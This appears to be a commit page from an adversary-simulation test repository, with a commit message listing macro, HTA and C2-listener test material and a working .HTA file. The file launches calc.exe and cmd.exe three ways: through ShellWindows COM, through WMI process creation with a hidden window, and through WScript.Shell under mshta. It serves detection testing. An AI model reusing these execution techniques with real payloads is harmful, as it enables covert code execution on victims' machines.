b51284297d
Adding the following: - New DragonsTail Chain reaction that does not execute Mimikatz. - Generic .HTA file with supporting markdown file highlighting details. - Generic `Atomic.doc` with supporting markdown file highlighting embedded macro. - Guide (markdown) explaining how to zip files to simulate email borne threats. - Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell. - Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
30 lines
949 B
HTML
30 lines
949 B
HTML
<html>
|
|
|
|
<script language="JScript">
|
|
|
|
// Type One
|
|
// Child of Explorer, cmd.exe
|
|
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
|
|
var SW = GetObject("new:" + ShellWindows).Item();
|
|
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
|
|
|
|
|
|
// Type Two
|
|
// Child of wmiprvse
|
|
var strComputer = ".";
|
|
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
|
|
var objStartup = objWMIService.Get("Win32_ProcessStartup");
|
|
var objConfig = objStartup.SpawnInstance_();
|
|
objConfig.ShowWindow = 0;
|
|
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
|
|
var intProcessID;
|
|
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
|
|
|
|
// Type Three
|
|
// Child of mshta.exe
|
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
|
|
|
close();
|
|
</script>
|
|
</html>
|